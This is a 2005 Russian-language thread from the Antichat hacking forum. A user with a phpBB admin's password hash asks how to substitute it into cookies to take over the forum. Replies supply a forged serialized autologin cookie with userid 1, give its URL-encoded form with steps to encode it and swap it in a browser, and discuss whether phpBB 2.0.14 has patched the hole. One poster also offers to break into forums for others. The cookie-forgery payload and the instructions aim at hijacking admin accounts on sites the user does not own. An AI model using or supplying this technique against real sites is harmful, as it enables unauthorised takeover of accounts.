HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Есть хеш админа форума phpBB.Можно ли заменитьть куки, чтобы получить права админа?
  #1  
Старый 04.05.2005, 14:42
proff
Новичок
Регистрация: 04.05.2005
Сообщений: 5
С нами: 11062515

Репутация: 0
По умолчанию Есть хеш админа форума phpBB.Можно ли заменитьть куки, чтобы получить права админа?

У меня имееться хеш админа форума phpBB могули я подставить ево в кукисы чтоб получить права админа.
Форум скорее всего phpBB-2.0.14.
Если да то пожалуста напишите как и поподробнее.
Очень буду благодарен.
 

  #2  
Старый 04.05.2005, 19:54
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами: 11282726

Репутация: 67
По умолчанию

А почему нет? Меняй id и хэш соотвтств админу и вперёд.
 

  #3  
Старый 04.05.2005, 21:57
proff
Новичок
Регистрация: 04.05.2005
Сообщений: 5
С нами: 11062515

Репутация: 0
По умолчанию

Там что то типа этого:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2221%22%3B% 7D
Можно по подробнее с подстановкой?
 

  #4  
Старый 04.05.2005, 22:03
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами: 11282726

Репутация: 67
По умолчанию

Нет проблем.
Вот куки:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:3:"1";}

1-id

вот так он кодируется:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A3%3A%221%22%3B%7D

http://www.albionresearch.com/misc/urlencode.php декодирование вот только по поводу хэша точно неотвечу. т.к. давно незанимался. и меняй лучше куки оперой или мазилой
 

  #5  
Старый 04.05.2005, 22:44
proff
Новичок
Регистрация: 04.05.2005
Сообщений: 5
С нами: 11062515

Репутация: 0
По умолчанию

Можно поподробней мне вот такой хеш нужно подставить 7ea1918c1ee062187e0d7f69ea600a4f ну и соответственно id 2 может кто поможет?
 

  #6  
Старый 05.05.2005, 03:01
OLIVER
Познающий
Регистрация: 05.02.2005
Сообщений: 73
С нами: 11188499

Репутация: 5
По умолчанию

я думал эта дыра закрыта...
 

  #7  
Старый 05.05.2005, 13:02
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
С нами: 11325926

Репутация: 648


По умолчанию

Цитата:
Можно и через www.ya.ru кодировать и декодировать.
Заходим, вводим любое слово для поиска, жмем поиск. Потом в адресной строке заметаем наше слово для поиска и пихаем нужное: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2221%22%3B% 7D
и смотрим что мы пытались найти: a:2:{s:11:"autologinid";s:0: 2";s:6:"userid";s:2:"21";}
Меняем на нужное нам и опять жмем поиск. Потом уже из адресной строки вытаскиваем типа закодированное.
...
А вообще, в phpBB последних версиях что-то не получается куку подкинуть. Может я просто криворукий...
 

  #8  
Старый 05.05.2005, 13:08
FoX's
Участник форума
Регистрация: 26.12.2004
Сообщений: 188
С нами: 11248166

Репутация: 107
По умолчанию

Цитата:
А вообще, в phpBB последних версиях что-то не получается куку подкинуть. Может я просто криворукий...
Их по ходу прикрыли... в phpBB 2.0.14 такого нет..
 

  #9  
Старый 05.05.2005, 13:14
Alpha White Jordan
Banned
Регистрация: 03.05.2005
Сообщений: 9
С нами: 11064035

Репутация: 0
По умолчанию

А пасс брутится в 2.0.14?

Кто хочет чтобы Я взломал форум 2.0.14, давайте мне пасс от Админки, и Я вам этот движок взломаю.
 

  #10  
Старый 05.05.2005, 13:21
FoX's
Участник форума
Регистрация: 26.12.2004
Сообщений: 188
С нами: 11248166

Репутация: 107
По умолчанию

Иди скачай форум.. зарегься на бесплатном хосте.. и ломай сколько влезит..
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Есть доступ к сайту.Возможно ли создав юзвера(phpBB), повысить ему права до админа? :|| Уязвимости CMS / форумов 9 25.01.2006 13:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.